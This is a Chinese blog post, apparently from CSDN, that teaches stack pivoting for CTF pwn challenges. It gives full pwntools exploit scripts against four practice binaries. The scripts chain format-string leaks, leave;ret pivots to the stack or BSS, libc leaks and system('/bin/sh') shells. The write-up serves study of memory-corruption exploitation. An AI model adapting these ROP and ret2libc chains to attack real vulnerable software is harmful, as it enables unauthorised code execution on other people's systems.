CTFpwn入门06--栈迁移学习

最新推荐文章于 2024-04-18 21:01:09 发布
最新推荐文章于 2024-04-18 21:01:09 发布
阅读量741 收藏 8
点赞数 27
文章标签: 迁移学习 人工智能 机器学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79880074/article/details/136402151
版权
文章讲述了在逆向工程和安全漏洞利用中,如何通过栈迁移技术,利用格式化字符串漏洞泄露地址,进而控制程序流程,包括64位和32位环境下的具体步骤和实例。着重介绍了如何在不同内存段(栈、BSS段)进行栈迁移以及GDB调试在过程中的作用。
摘要由CSDN通过智能技术生成

栈迁移主要应用于我们所构造的payload字节数过多,导致程序无法完全读入栈中达到我们想要的效果。先通过一篇文章学习一下栈迁移的基础知识。

栈迁移原理介绍与应用-CSDN博客

pwn1:64位泄露地址

ida查看

审计代码发现程序存在两次读入数据,且第一次读入数据是存在格式化字符串漏洞的,两次可读入的字节都非常少,我们需要利用栈迁移来完成。基本思路是利用格式化字符串打印出buf的地址,根据v2与buf的偏移计算出v2读入的起始地址,利用栈迁移读入数据。

from pwn import*
context(os='linux', arch='i386', log_level='debug')
p=process('./pwn1')
elf=ELF('./pwn1')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
rdi=0x0000000000401333
leave=0x4012AA
gdb.attach(p)
p.send(b'aaaaaaaa')
p.recvuntil('0x')
v2=int(p.recv(12),16)+8
print(hex(v2))
p.interactive()

我们已经有了v2的起始地址,即第二次读入数据的起始地址,那么我们在第二次读入数据就有0x60个字节,是绝对够用的。我们直接传入数据利用leave ret从v2起始地址开始执行payload即可。利用第二次读入泄露libc地址。

from pwn import*
context(os='linux', arch='i386', log_level='debug')
p=process('./pwn1')
elf=ELF('./pwn1')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
rdi=0x0000000000401333
leave=0x4012AA
gdb.attach(p)
p.send(b'aaaaaaaa')
p.recvuntil('0x')
v2=int(p.recv(12),16)+8
print(hex(v2))
pause()
p.recvuntil('more infomation plz:')
payload=(b'a'*8+p64(rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(0x4011fb)).ljust(0x50,b'\x00')+p64(v2)+p64(leave)
p.send(payload)
read_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(read_addr))
libc_base=read_addr-libc.sym['read']
print(hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh = libc_base +next(libc.search(b'/bin/sh'))
p.interactive()

接下来第二次运行程序构造system(/bin/sh),再次利用栈迁移执行,需要注意我们依旧需要通过第一次读入数据泄露地址,通过gdb调试可以看到,buf的地址在第二次运行时是改变了的。这里就不在过多解释了,gdb调试即可。

from pwn import*
context(os='linux', arch='i386', log_level='debug')
p=process('./pwn1')
elf=ELF('./pwn1')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
rdi=0x0000000000401333
leave=0x4012AA
p.send(b'aaaaaaaa')
p.recvuntil('0x')
v2=int(p.recv(12),16)+8
print(hex(v2))
p.recvuntil('more infomation plz:')
payload=(b'a'*8+p64(rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(0x4011fb)).ljust(0x50,b'\x00')+p64(v2)+p64(leave)
p.send(payload)
read_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(read_addr))
libc_base=read_addr-libc.sym['read']
print(hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh = libc_base +next(libc.search(b'/bin/sh'))
p.recvuntil('your name:')
p.send(b'aaaaaaaa')
p.recvuntil('0x')
v3=int(p.recv(12),16)+8
print(hex(v3))
p.recvuntil('more infomation plz:')
payload=(b'a'*8+p64(rdi)+p64(bin_sh)+p64(rdi+1)+p64(system)).ljust(0x50,b'\x00')+p64(v3)+p64(leave)
p.send(payload)
p.interactive()

 pwn2:32位泄露地址

 

和pwn1做法基本相同,第一次读入是可以刚好读到ebp的位置的,我们利用格式化字符串可以把ebp的地址给泄露出来,根据偏移计算出s读入的起始地址进行栈迁移。

可以看到我们打印出来的地址并不是ebp的栈地址,而是ebp指向的地址 ,我们需要计算。

第二次就可以利用栈迁移了

from pwn import*
context.log_level='debug'
p=process('./pwn2')
elf=ELF('./pwn2')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
p.recvuntil('your name?')
payload=b'a'*(0x27)+b'b'
p.send(payload)
p.recvuntil('b')
a=u32(p.recv(4))-0x10-0x28
print(hex(a))
system=0x8048400
payload=(b'a'*4+p32(system)+p32(0)+p32(a+16)+b'/bin/sh\x00').ljust(0x28)+p32(a)+p32(0x08048562)
p.send(payload)
p.interactive()

pwn3:栈迁移至bss段

 

依旧是存在两次读入,但第一次读入是把数据存在了bss段,是没有执行的,所以我们可以利用第二次读入时将栈迁往bss段从而执行我们第一次构造的payload。

from pwn import*
context.log_level='debug'
p=process('./bss')
elf=ELF('./bss')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
rdi=0x00000000004012a3
leave=0x40120E
bss=0x406060
vuln=0x4011bd
p.recvuntil('hello')
payload=b'a'*8+p64(rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(vuln)
p.send(payload)
p.recvuntil('say?')
pay=b'a'*(0x60)+p64(bss)+p64(leave)
p.send(pay)
libc_base=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['read']
print(hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh = libc_base +next(libc.search(b'/bin/sh'))
p.interactive()

我们成功把栈迁往了bss段并泄露出libc地址

 

接下来就是简单的栈迁移了,但是第二次栈迁移的位置并非我们所想的与第一次一样,通过gdb调试我们发现第二次读入的位置时是发生了变化的。

完整exp:

from pwn import*
context.log_level='debug'
p=process('./bss')
elf=ELF('./bss')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
rdi=0x00000000004012a3
leave=0x40120E
bss=0x406060
vuln=0x4011bd
p.recvuntil('hello')
payload=b'a'*8+p64(rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(vuln)
p.send(payload)
p.recvuntil('say?')
pay=b'a'*(0x60)+p64(bss)+p64(leave)
p.send(pay)
libc_base=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['read']
print(hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh = libc_base +next(libc.search(b'/bin/sh'))
p.recvuntil('hello')
payload=b'a'*8+p64(rdi)+p64(bin_sh)+p64(rdi+1)+p64(system)
#gdb.attach(p)
p.send(payload)
buf=0x406020
p.recvuntil('say?')
pay=(b'a'*8+p64(rdi)+p64(bin_sh)+p64(rdi+1)+p64(system)).ljust(0x60,b'\x00')+p64(buf)+p64(leave)
p.send(pay)
p.interactive()

 pwn4:只有一次读入

 只有一个readr,没有格式化字符串,无法泄露地址,因此还是需要把栈迁往bss段。需要利用read函数

看read的汇编我们可以发现read的读入位置我们是可以修改的,即rbp+buf

from pwn import*
context.log_level='debug'
p=process('./vuln')
elf=ELF('./vuln')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
rdi=0x00000000004012b3
leave=0x0000000000401227
bss=0x404020+0x500
vuln=0x4011db
p.recvuntil('just chat with me:')
read=0x00000000004011FF
rbp=0x000000000040115d
pay=b'a'*0x50+p64(bss+0x50)+p64(read)
#gdb.attach(p)
p.send(pay)
p.interactive()

这里我们成功将read的读入位置修改到bss段

 接下来构造payload泄露libc地址

payload=(b'a'*8+p64(rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(rbp)+p64(bss+0x50+0x500)+p64(read)).ljust(0x50,b'\x00')+p64(bss)+p64(leave)
p.send(payload)

 这里依旧是需要再次调用read函数修改下次读入的起始地址,泄露libc地址构造下一次payload即可。

完整exp:

from pwn import*
context.log_level='debug'
p=process('./pwn4')
elf=ELF('./pwn4')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
rdi=0x00000000004012b3
leave=0x0000000000401227
bss=0x404020+0x500
vuln=0x4011db
p.recvuntil('just chat with me:')
read=0x00000000004011FF
rbp=0x000000000040115d
pay=b'a'*0x50+p64(bss+0x50)+p64(read)
gdb.attach(p)
p.send(pay)
payload=(b'a'*8+p64(rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(rbp)+p64(bss+0x50+0x500)+p64(read)).ljust(0x50,b'\x00')+p64(bss)+p64(leave)
p.send(payload)
libc_base=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['read']
print(hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh = libc_base +next(libc.search(b'/bin/sh'))
pay=(b'a'*8+p64(rdi)+p64(bin_sh)+p64(rdi+1)+p64(system)).ljust(0x50,b'\x00')+p64(bss+0x500)+p64(leave)
p.send(pay)
p.interactive()

栈迁移知识非常重要,其难度也挺高,需要我们不停的进行gdb调试观察,但是一旦理解了就非常容易了。

 

笙南!
关注
CTF|rop emporium pivot32 writeup (迁移题型)
skyattractive的博客
06-13 713
CTF|rop emporium pivot32 writeup (迁移题型) 题目来源:https://ropemporium.com/challenge/pivot.html malloc生成了一个堆区 pwnme函数里面有两个gets函数,存在溢出的地方,在第二个gets,但是他在填充完s之后所剩下的空间位58-0x28-4,是一个很小的空间,在这样的狭小空间里面是不足以构造rop chain的。 stack pivoting 具有这样特点的题目叫做stack pivoting。 stack
pwn--迁移
weixin_44642009的博客
04-17 1019
迁移–ROP 本次实验我们使用lab4的可执行文件。 在开始之前我们需要明确一些问题以及需要注意的地方,以下我会讲到,这也是在实验过程中我碰到的一些情况和解题关键: 为什么使用迁移? 由上图可知,程序开辟的堆大小是0x50字节,而read函数输入可以输入0x60字节,明显存在溢出的可能,不过可输入的字节数不是足够多,空间较小,不足以使我们填入足够的ROP链,所以我们需要迁移。 ...
CTF[PWN]--迁移、格式化字符串漏洞、随机数撞库
2301_79880752的博客
03-11 979
开启NX,64位,动态编译,IDA分析:两次读入,第一次读入结束给了我们read函数的地址,第二次读入可以溢出,但是只能覆盖一个返回地址,自然而然的想到了迁移,因为第一次给了我们地址,就可以通过偏移去求出第二次read读入的起始地址由于本题给了提示,用的是ubuntu 16.04,因此libc库应为libc2.23(后来才知道,由于之前做题都是打本地,导致当时做这题的时候本地脚本写的很快,但在连接远程libc时却花了大功夫)
CTF-PWN迁移
m0_53921051的博客
04-05 914
帧介绍 C语言函数调用帧_大佬菜菜带带的博客-CSDN博客 迁移背景 在溢出构造rop链时,有时我们会遇到构造空间不够的情况。比如我们需要构造0x30字节的数据,而read()只能读入0x28字节。但是我们可以控制ebp及ret的值,此时可以利用迁移的方法拓展空间。 迁移条件 能够控制rbp及ret的值。 拥有一块可执行的内存,并且可以连续两次控制该内存。 迁移原理 在函数调用完返回时,会执行leave,ret两条汇编指令。 leave: mov esp ebp; pop
[Black Watch 入群题]PWN-迁移
个人笔记
04-20 498
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出空间只有0x20-0x18=8字节无法构造rop,所以需要利用迁移技术,迁移到bss上构造rop。bss布局:(左边是第一泄露Libc构造帧,右边是第二次重写获取shell的帧)改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要。迁移操作:构造好中ebp新位置。思路:ret2shellcode。迁移关键指令:leave。
迁移原理介绍与应用
weixin_39529207的博客
02-20 5464
本文将对CTF Pwn中「迁移」(又称「转移」)这一技术进行介绍与分析,希望读完本文后以下问题将不再困扰你: 什么是迁移迁移解决了什么问题? 怎么使用迁移这个技巧? 开始之前,有如下预备知识会极大提升你的阅读体验: CTF Pwn是在做什么?提权(Getshell)是什么意思? 在操作系统内存布局中,是一种怎样的结构,具有怎样的特点? x86中常用寄存器的名称与作用?函数调用的原理与过程是怎样的? 溢出攻击的核心技巧是什么? 溢出是怎么回事?  在预备知识的4个问
pwn-迁移-ROP
leeham的博客
08-23 4197
# 迁移-ROP 题目描述 这里给出题目链接 https://github.com/LeeHaming/CTF-learn/blob/master/easyR0p/easyR0p 程序的结构很简单,main()函数中有一个while(1)的循环,循环中rop()函数执行。 rop()中有明显的溢出,最开始给s申请的内存空间为:0x40;然而read()可以读入0x50字节。 于是就...
PWN入门迁移-附件资源
03-02
PWN入门迁移-附件资源
pwn --迁移
zszcr的博客
04-07 7092
迁移主要是为了解决溢出可以溢出空间大小不足的问题迁移的实现:通过将ebp覆盖成我们构造的fake_ebp ,然后利用leave_ret这个gadget将esp劫持到fake_ebp的地址上leave_ret相当于:mov %ebp,%esp pop %ebp pop %eip接下来拿HITCON-Training-master 的 lab6做例子题目链接:https://github.com...
AI入门:神经网络实战----迁移学习
wangeil007的博客
01-01 1646
前言 学过化学的人都知道,到现在为止,世界上一共只发现118种化学元素,通过不同的排列组合,却可以得到我们丰富多彩的世界。同样的,简单的几何结构也就那么几种,但正是由它们组成了这个世界。换个角度看,这个世界中的任何物体都是简单的几何结构中的一种或几种组合而成。 从上面的描述我们可以得出一个结论:任何物体的基本结构都是相似的。这个结论跟我们今天要学习的迁移学习有什么关系呢?请看下一段,什么是迁移学习。 什么是迁移学习? 在计算机视觉中,迁移学习往往使用带有卷积的神经网络 (不记得卷积神经网络的话,请查阅前面的
[CTF]PWN--沙盒中的迁移构造read利用
2301_79880752的博客
02-26 1174
我们需要在调试中寻找read函数的返回地址,将其作为读入的位置,因为我们后面要在这个构造的read函数中读入orw,我们将orw写入到read函数返回地址上,这样读入之后就可以直接执行orw获取权限,为了使程序运行成功我们可以先随便写一个bss地址作为读入位置。还记得我们一开始将读入位置迁到bss段上了吗,连接远程时程序运行时的生成地址可能会改变,但是,内存(bss)是不会变的,因此本题我们可以直接通过调试得到返回地址,而这个返回地址必然是bss段地址,也就是说在连接远程的时候是不会改变的。
PWN——迁移
L2329794714的博客
08-29 1630
简单一句话就是控制esp指针的指向。实现指令:eave;ret 指令Leave等价于:其实就是在做恢复上一次空间的操作。但这过程中能恢复到上次的的关键数据为当前ebp指向地址上值(oldebp),当我们通过溢出覆盖原本的oldebp值时,然后将leave;ret 程序段地址放在返回地址上,那么就可以实现将esp迁移至我们想要的地方(取决于oldebp上的覆盖的地址,注意这里会抬高4字节,64位抬8字节)。第一次leave第一次ret:因为esp还是指向leave;.........
[PWN]——迁移及部分基础
最新发布
ysy___ysy的博客
04-18 1480
由高到低,自顶向下增长,ebp指向底 【减(push)即指针向高移,加(pop)即指针向低移】。溢出能使我们覆盖上某些区域的值,甚至是当前函数的返回地址 ret;一旦 ret 覆盖为某个奇怪的值,例如 0xdeadbeaf,当函数结束恢复现场,即 eip 指向 ret 时,程序将会跳转到内存中的 0xdeadbeaf 处。此时,内核会立即告诉我们“SIGSEV”,即常见的段错误(Segment Fault)。注意:函数传参时从右往左。
[迁移][BUUCTF][PWN] ciscn_2019_es_2
m0_50819561的博客
09-25 427
前置知识: 迁移概念:当存在溢出且可溢出长度不足以容纳 payload 时,可采用迁移。一般这种情况下,溢出仅能覆盖 ebp 、 eip 。因为原来的空间不足,所以要构建一个新的空间放下 payload ,因此称为迁移迁移原理:执行命令是从esp指向的位置想ebp指向的位置执行。正常情况退的操作是:esp指向ebp指向位置,ebp指向ebp里的内容所指向的位置。当遇见leave|ret命令的时候,相当于执行mov esp ebp; pop ebp; ret;作用就是将ebp指向的位置给
迁移...
2301_79880752的博客
01-22 1038
将读入位置修改到bss段,然后写入rop链,再通过迁移来执行rop链,因此我们就可以通过两次返回read函数,两次迁移,通过libc的做法来获取权限,第一次返回read函数泄露libc基址,第二次返回获取权限。就简简单单一个read函数,读入的字节只够填写一个返回地址,大概可以猜到这题是要用迁移做,但是又跟常规的迁移不同,这题不仅只有一次读入,还不能泄露地址,那要如何做呢?接上文,我们可以发现,read函数的第一个参数与第三个参数是固定的,而第二个参数由rbp与buf决定。这边有个小知识点,如果。
迁移
weixin_44932880的博客
10-13 653
leave ret 原理 一次leave 将 rsp指向 原rbp+8 , rbp指向原rbp 的内容, move rsp rbp (rbp的地址赋值给rsp的地址,即rsp指向rbp) pop rbp (rbp指向rsp的内容(rbp的内容),rsp+=8) 一次ret rip指向原rsp的内容,rsp+=8 pop rip 一次leave ret 使rbp指向原rbp的内容,rsp指向 原rbp+16,rip指向原rbp+8 两次leave ret
(只有静态直接ropgadget,64位迁移,uaf+dou c)picoctf_2018_can_you_gets_me+actf_2019_babystack+ciscn2019_final_3
weixin_61283545的博客
07-21 551
复现了一下别人的exp,2.27是可以在tcache中doublefree的如果有uaf漏洞就可以伪造堆块修改大小超过0x400来构造unsortbin,但是我们更改前申请的堆的大小总和一点要大于我们构造unsortbin的大小不然就会报错,还有一点在链表里面没有tcache时我们是无法malloc到unsortbin的所以,我们就只能,先随意free一个之后再malloc一个堆块。...
【PWN · 迁移】[CISCN 2019东南]PWN2
Mr_Fmnwon的博客
10-14 431
当存在溢出但是溢出字符数并不多的情况下,可以尝试在别处构造rop链,通过迁移到目标内存区域,执行rop链。这里不讲迁移原理,仅是对题目的分析,适合对迁移有初步了解的童鞋食用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值